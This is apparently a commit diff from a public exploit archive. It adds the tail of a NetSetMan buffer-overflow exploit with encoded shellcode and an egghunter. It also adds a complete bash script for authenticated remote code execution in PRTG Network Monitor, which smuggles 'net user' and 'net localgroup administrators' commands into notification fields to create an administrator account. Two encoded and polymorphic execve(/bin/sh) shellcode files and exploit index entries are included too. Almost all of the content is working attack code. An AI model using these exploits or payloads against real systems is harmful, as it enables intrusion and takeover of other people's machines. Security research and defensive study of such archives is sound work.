shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x69\x6c\x59\x78\x6d\x52\x57\x70"
shellcode += "\x43\x30\x75\x50\x53\x50\x6c\x49\x49\x75\x36\x51"
shellcode += "\x39\x50\x71\x74\x6c\x4b\x56\x30\x46\x50\x4e\x6b"
shellcode += "\x71\x42\x46\x6c\x4e\x6b\x76\x32\x57\x64\x6e\x6b"
shellcode += "\x44\x32\x34\x68\x76\x6f\x6d\x67\x43\x7a\x71\x36"
shellcode += "\x44\x71\x6b\x4f\x6e\x4c\x57\x4c\x65\x31\x33\x4c"
shellcode += "\x47\x72\x36\x4c\x75\x70\x6f\x31\x5a\x6f\x34\x4d"
shellcode += "\x67\x71\x39\x57\x48\x62\x4a\x52\x43\x62\x46\x37"
shellcode += "\x6c\x4b\x32\x72\x32\x30\x6c\x4b\x71\x5a\x45\x6c"
shellcode += "\x6e\x6b\x70\x4c\x32\x31\x73\x48\x4a\x43\x63\x78"
shellcode += "\x56\x61\x6e\x31\x56\x31\x6e\x6b\x30\x59\x57\x50"
shellcode += "\x35\x51\x79\x43\x6c\x4b\x72\x69\x55\x48\x4d\x33"
shellcode += "\x46\x5a\x52\x69\x4e\x6b\x77\x44\x6e\x6b\x76\x61"
shellcode += "\x68\x56\x75\x61\x6b\x4f\x6c\x6c\x59\x51\x78\x4f"
shellcode += "\x66\x6d\x77\x71\x4b\x77\x30\x38\x6d\x30\x51\x65"
shellcode += "\x58\x76\x53\x33\x43\x4d\x69\x68\x67\x4b\x73\x4d"
shellcode += "\x67\x54\x50\x75\x4b\x54\x62\x78\x4c\x4b\x73\x68"
shellcode += "\x76\x44\x57\x71\x68\x53\x71\x76\x6e\x6b\x56\x6c"
shellcode += "\x72\x6b\x6e\x6b\x43\x68\x47\x6c\x66\x61\x6e\x33"
shellcode += "\x6e\x6b\x76\x64\x6c\x4b\x36\x61\x6a\x70\x6d\x59"
shellcode += "\x31\x54\x76\x44\x66\x44\x63\x6b\x61\x4b\x65\x31"
shellcode += "\x51\x49\x50\x5a\x73\x61\x59\x6f\x79\x70\x51\x4f"
shellcode += "\x71\x4f\x43\x6a\x4e\x6b\x55\x42\x5a\x4b\x4c\x4d"
shellcode += "\x73\x6d\x61\x7a\x37\x71\x6c\x4d\x6c\x45\x58\x32"
shellcode += "\x55\x50\x45\x50\x43\x30\x36\x30\x52\x48\x64\x71"
shellcode += "\x6c\x4b\x32\x4f\x4e\x67\x59\x6f\x79\x45\x4f\x4b"
shellcode += "\x6b\x4e\x56\x6e\x75\x62\x48\x6a\x65\x38\x6f\x56"
shellcode += "\x4a\x35\x6d\x6d\x6f\x6d\x6b\x4f\x68\x55\x75\x6c"
shellcode += "\x53\x36\x43\x4c\x36\x6a\x4b\x30\x4b\x4b\x6d\x30"
shellcode += "\x34\x35\x77\x75\x4f\x4b\x62\x67\x64\x53\x30\x72"
shellcode += "\x72\x4f\x30\x6a\x53\x30\x43\x63\x4b\x4f\x68\x55"
shellcode += "\x42\x43\x30\x61\x70\x6c\x31\x73\x44\x6e\x30\x65"
shellcode += "\x32\x58\x51\x75\x55\x50\x41\x41"
egghunter =(
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA"
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A"
"PB944JBC6SQGZKOLO0B0RQZOSR88MNNOLKUPZSDJO6XT7NPNP3DTKKJ6OD5JJ"
"6OBUK7KOYWLJA"
)
regPrep = (
"\x63" #nop/align
"\x55" #push ebp
"\x62" #nop/align
"\x58" #pop eax
"\x62" #nop/align
"\x05\x14\x11" #add eax, 0x11001400
"\x62" #nop/align
"\x2d\x13\x11" #sub eax, 0x11001300
"\x62" #nop/align
"\x50" #push eax
"\x62" #nop/align
"\xc3") #ret
buffer = ""
buffer += "\x61" * 75 #junk
buffer += "\x62" * 1 #nop
#0x00590058 : pop ebx # pop ebp # ret 0x08 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [netsetman.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.7.1.0 (C:\Program Files\NetSetMan\netsetman.exe)
buffer += "\x58\x59" #SEH overwrite to pop-pop-ret instruction
buffer += regPrep
buffer += "\x62" * 108 #offset to egghunter
buffer += egghunter
#Write initial SEH overflow payload + egghunter with venetian shellcode
f = open('payload1.txt','w')
f.write(buffer)
f.close()
#Egg + alphanumeric encoded shellcode payload
g = open('payload2.txt', 'w')
g.write(shellcode)
g.close()

97
exploits/windows/webapps/46527.sh Executable file
View file

@ -0,0 +1,97 @@
#!/bin/bash
echo -e "\n\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Authenticated PRTG network Monitor remote code execution [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Date: 11/03/2019 [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Vendor Homepage: https://www.paessler.com/prtg [*] \e[00m"
echo -e "\e[00;32m[*] Version: 18.2.38 [*] \e[00m"
echo -e "\e[00;32m[*] CVE: CVE-2018-9276 [*] \e[00m"
echo -e "\e[00;32m[*] Reference: https://www.codewatch.org/blog/?p=453 [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\n\e[00;32m# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.\n# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' \e[00m\n"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
usage()
{
echo -e '\e[00;35m EXAMPLE USAGE:\e[00m\e[00;32m ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1" \e[00m\n'
}
create_file()
{
data="name_=create_file&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
fireone=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data" --cookie "$cookie" $url/editsettings)
# use bat file; save file to C:\Users\Public\tester.txt change accordingly
echo "$fireone"
echo -e "\e[00;32m [*] file created \e[00m"
}
ex_notify_1()
{
for i in range {0..50}; do
fireone=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}
create_user()
{
data2="name_=create_user&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
firetwo=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data2" --cookie "$cookie" $url/editsettings)
# use ps1 script to execute code; adding a new user with username pentest and password P3nT3st!
echo "$firetwo"
echo -e "\e[00;32m [*] adding a new user 'pentest' with password 'P3nT3st' \e[00m"
}
ex_notify_2()
{
for i in range {0..50}; do
fire2=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}
add_user_admin()
{
data3="name_=user_admin&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
firethree=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data3" --cookie "$cookie" $url/editsettings)
echo "$firethree"
echo -e "\e[00;32m [*] adding a user pentest to the administrators group \e[00m"
}
ex_notify_3()
{
for i in range {0..50}; do
fire3=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
echo -e "\n\n\e[00;32m [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! \e[00m"
}
if [[ $# -eq 0 ]] ; then
usage
exit 0
fi
while getopts "hu:c:" option; do
case "${option}" in
c) cookie=${OPTARG};;
h) usage;;
u) url=${OPTARG};;
*) usage; exit;;
esac
done
create_file
ex_notify_1
sleep 3
create_user
ex_notify_2
sleep 3
add_user_admin
ex_notify_3

7
files_exploits.csv
View file

@ -6351,6 +6351,7 @@ id,file,description,date,author,type,platform,port
46502,exploits/linux/dos/46502.txt,"Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem",2019-03-06,"Google Security Research",dos,linux,
46503,exploits/android/dos/46503.txt,"Android - binder Use-After-Free via racy Initialization of ->allow_user_free",2019-03-06,"Google Security Research",dos,android,
46504,exploits/android/dos/46504.txt,"Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass",2019-03-06,"Google Security Research",dos,android,
46529,exploits/linux/dos/46529.c,"Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak",2019-03-11,wally0813,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10351,6 +10352,8 @@ id,file,description,date,author,type,platform,port
46437,exploits/windows/local/46437.txt,"Memu Play 6.0.7 - Privilege Escalation",2019-02-21,"Alejandra Sánchez",local,windows,
46507,exploits/windows/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows,
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,
46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware,
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40966,3 +40969,7 @@ id,file,description,date,author,type,platform,port
46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,
46518,exploits/windows/webapps/46518.txt,"McAfee ePO 5.9.1 - Registered Executable Local Access Bypass",2019-03-08,leonjza,webapps,windows,
46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php,
46525,exploits/multiple/webapps/46525.rb,"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,multiple,
46526,exploits/jsp/webapps/46526.rb,"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,jsp,
46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80
46528,exploits/php/webapps/46528.py,"Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution",2019-03-11,redtimmysec,webapps,php,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -950,3 +950,5 @@ id,file,description,date,author,type,platform
46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86
46523,shellcodes/linux_x86/46523.py,"Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
46524,shellcodes/linux_x86/46524.c,"Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86

1 id file description date author type platform
950 46397 shellcodes/macos/46397.c macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) 2019-02-18 Ken Kitahara shellcode macos
951 46499 shellcodes/linux_x86/46499.c Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes) 2019-03-05 Daniele Votta shellcode linux_x86
952 46519 shellcodes/linux_x86/46519.c Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes) 2019-03-08 Daniele Votta shellcode linux_x86
953 46523 shellcodes/linux_x86/46523.py Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes) 2019-03-11 Daniele Votta shellcode linux_x86
954 46524 shellcodes/linux_x86/46524.c Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes) 2019-03-11 Daniele Votta shellcode linux_x86

99
shellcodes/linux_x86/46523.py Executable file
View file

@ -0,0 +1,99 @@
/*
; Date: 02/03/2019
; NOT-Encoder.py
; Author: Daniele Votta
; Description: This program encode shellcode with NOT technique.
; Tested on: i686 GNU/Linux
; Shellcode Length:25
#!/usr/bin/python
# Python NOT Encoder
# Execve /bin/sh
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode...'
for x in bytearray(shellcode):
# NOT Encoding
y = ~x
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' % (y & 0xff)
print encoded +"\n"
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
*/
#include<stdio.h>
#include<string.h>
/*
; NOT-Decoder.asm
; Author: Daniele Votta
; Description: This program decode shellcode with NOT technique.
; Tested on: i686 GNU/Linux
; Shellcode Length:44
; JMP | CALL | POP | Techniques
NOT-Decoder: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: eb 0c jmp 804808e <call_decoder>
08048082 <decoder>:
8048082: 5e pop esi
8048083: 31 c9 xor ecx,ecx
8048085: b1 19 mov cl,0x19
08048087 <decode>:
8048087: f6 16 not BYTE PTR [esi]
8048089: 46 inc esi
804808a: e2 fb loop 8048087 <decode>
804808c: eb 05 jmp 8048093 <EncodedShellcode>
0804808e <call_decoder>:
804808e: e8 ef ff ff ff call 8048082 <decoder>
08048093 <EncodedShellcode>:
8048093: ce into
8048094: 3f aas
8048095: af scas eax,DWORD PTR es:[edi]
8048096: 97 xchg edi,eax
8048097: d0 d0 rcl al,1
8048099: 8c 97 97 d0 9d 96 mov WORD PTR [edi-0x69622f69],ss
804809f: 91 xchg ecx,eax
80480a0: 76 1c jbe 80480be <__bss_start+0x12>
80480a2: af scas eax,DWORD PTR es:[edi]
80480a3: 76 1d jbe 80480c2 <__bss_start+0x16>
80480a5: ac lods al,BYTE PTR ds:[esi]
80480a6: 76 1e jbe 80480c6 <__bss_start+0x1a>
80480a8: 4f dec edi
80480a9: f4 hlt
80480aa: 32 .byte 0x32
80480ab: 7f .byte 0x7f
[+] Extract Shellcode ...
"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"
======================= POC Daniele Votta =======================
*/
/* NOT Encoded Execve /bin/sh */
unsigned char code[] = \
"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

76
shellcodes/linux_x86/46524.c Normal file
View file

@ -0,0 +1,76 @@
/*
; Date: 09/03/2019
; Polymorphic_Execve_Sh_Stack.asm
; Author: Daniele Votta
; Description: This program invoke a Polimorphic version of excve.
Original Execve_Sh_Stack: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor eax,eax
8048082: 50 push eax
8048083: 68 2f 2f 73 68 push 0x68732f2f
8048088: 68 2f 62 69 6e push 0x6e69622f
804808d: 89 e3 mov ebx,esp
804808f: 50 push eax
8048090: 89 e2 mov edx,esp
8048092: 53 push ebx
8048093: 89 e1 mov ecx,esp
8048095: b0 0b mov al,0xb
8048097: cd 80 int 0x80
[+] Extract Shellcode ...
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
Shellcode Length:25
======================= POC Daniele Votta =======================
Polimorphic_Execve_Sh_Stack: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c3 xor ebx,eax
8048082: 31 d8 xor eax,ebx
8048084: 89 c1 mov ecx,eax
8048086: 51 push ecx
8048087: bf 40 40 84 79 mov edi,0x79844040
804808c: 81 ef 11 11 11 11 sub edi,0x11111111
8048092: 89 7c 24 fc mov DWORD PTR [esp-0x4],edi
8048096: bf 2f 62 69 6e mov edi,0x6e69622f
804809b: 81 c7 11 11 11 11 add edi,0x11111111
80480a1: 81 ef 11 11 11 11 sub edi,0x11111111
80480a7: 89 7c 24 f8 mov DWORD PTR [esp-0x8],edi
80480ab: 83 ec 04 sub esp,0x4
80480ae: 83 ec 04 sub esp,0x4
80480b1: 89 e3 mov ebx,esp
80480b3: 50 push eax
80480b4: 89 e2 mov edx,esp
80480b6: 53 push ebx
80480b7: 89 e1 mov ecx,esp
80480b9: b0 01 mov al,0x1
80480bb: 04 0a add al,0xa
80480bd: cd 80 int 0x80
[+] Extract Shellcode ...
"\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80"
Shellcode Length:63
======================= POC Daniele Votta =======================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}